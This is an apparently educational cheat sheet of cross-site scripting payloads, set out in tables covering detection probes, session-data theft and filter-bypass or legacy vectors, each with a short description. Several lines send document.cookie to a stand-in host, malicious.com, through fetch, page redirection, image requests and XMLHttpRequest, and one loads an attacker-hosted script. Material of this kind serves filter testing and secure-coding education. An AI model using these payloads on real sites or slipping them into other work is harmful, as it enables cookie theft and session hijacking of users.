These examples demonstrate various ways an attacker might attempt to execute unauthorized script code in a user's browser. The focus is on how to prevent these attacks through secure coding practices, input validation, and proper output encoding.
These payloads are typically used to confirm the presence of an XSS vulnerability.
| Payload | Description | Injection context/mechanism |
|---|---|---|
| `<script>alert('XSS')</script>` | Displays a simple alert box, confirming that injected markup is parsed and executed. | Standard script tag execution (HTML body context). |
| `<img src="x" onerror="alert('XSS')">` | Executes the alert when the image fails to load; the `src` is deliberately invalid to force the error. | Event handler attribute on an HTML tag. |
| `<svg/onload=alert('XSS')>` | Executes the alert as soon as the SVG element is parsed; the `/` in place of a space and the unquoted value defeat naive filters. | Event handler on an SVG tag. |
| `"><script>alert('XSS')</script>` | Closes an existing quoted attribute value and its tag, then injects a script. | Attribute/tag closure (injection point inside an attribute). |
| `<body onload=alert('XSS')>` | Executes when the document body finishes loading. | Event handler on the `<body>` tag. |
| `<a href="javascript:alert('XSS')">Click me!</a>` | Executes when the user clicks the link, so it needs user interaction. | `javascript:` pseudo-protocol in an anchor's `href`. |
| `onmouseover="alert('XSS')"` | Executes when the mouse moves over the element; meant for injection into an existing tag's attribute list rather than as a new tag. | Event handler attribute (the injection point must already be inside a tag). |
These payloads are used to access and display or transmit data from the user's current session or environment.
| Payload | Description | Injection context/mechanism |
|---|---|---|
| `<script>alert(document.cookie)</script>` | Shows the cookies readable by script in an alert; cookies flagged `HttpOnly` are not included. | Standard script tag execution. |
| `<script>alert(document.domain)</script>` | Displays the page's domain, proving which origin the injected script runs in. | Standard script tag execution. |
| `<script>fetch("http://malicious.com/?cookie="+document.cookie)</script>` | Sends the user's cookies to an attacker-controlled server in the query string. | Fetch API request. |
| `<script>document.location='http://malicious.com/?cookie=' + document.cookie;</script>` | Sends cookies by navigating the whole page to the attacker's URL; visible to the victim, but not subject to CSP fetch directives. | Redirection/location change. |
| `<script>new Image().src='http://malicious.com/?data=' + document.domain;</script>` | Transmits data through an image request that is never rendered; the same pattern works for cookies. | Image object as a covert request channel. |
| `<script>xhr=new XMLHttpRequest();xhr.open('GET','https://malicious.com?cookie='+document.cookie,true);xhr.send();</script>` | Sends cookie information to a server using XMLHttpRequest. | Asynchronous request. |
| `<script>localStorage.setItem('data', document.cookie);</script>` | Copies the cookies into Web Storage, where they persist across sessions and can be read later by another injection on the same origin; nothing leaves the browser by itself. | Web Storage API. |
These payloads use less common tags, attributes, or protocols to bypass simple filters or perform more complex actions. Several are legacy vectors that current browsers no longer execute; they are listed because filters are often tested against them and because older embedded browsers may still honour them.
| Payload | Description | Injection context/mechanism |
|---|---|---|
| `<script src="http://example.com/malicious-code.js"></script>` | Loads and executes an attacker-hosted script, so the size of the injection point no longer limits what can run. | External script sourcing. |
| `<iframe src="javascript:alert('XSS')">` | Runs JavaScript in a frame whose `src` is a `javascript:` URL; the code executes with the origin of the embedding document. | `javascript:` pseudo-protocol in an `<iframe>`. |
| `<div style="background:url('javascript:alert('XSS')')"></div>` | Legacy vector: `javascript:` URLs in CSS are not executed by current browsers (the nested single quotes also break the `url()` token). | CSS property value (historical). |
| `<embed src="javascript:alert('XSS')">` | Legacy vector: current mainstream browsers do not run `javascript:` URLs in `<embed>`. | `javascript:` pseudo-protocol in `<embed>` (historical). |
| `<style>@import 'javascript:alert("XSS")';</style>` | Legacy vector: current browsers do not execute `javascript:` in `@import`. | CSS `@import` rule (historical). |
| `<script>document.domain='malicious.com';</script>` | Relaxes the origin used for same-origin checks. It only succeeds when the value is a parent domain of the current one (e.g. `example.com` from `app.example.com`); setting an unrelated domain such as `malicious.com` throws a `SecurityError`. The setter is deprecated. | Document object modification. |
| `<script>window.parent.location='http://malicious.com';</script>` | Redirects the parent window (when the injected page is framed) to an attacker's site; blocked when the frame is sandboxed without `allow-top-navigation`. | Frame-busting/redirection. |
For those interested in learning more about different XSS vectors and defensive coding practices, these open-source resources can be invaluable (use responsibly for defense and learning):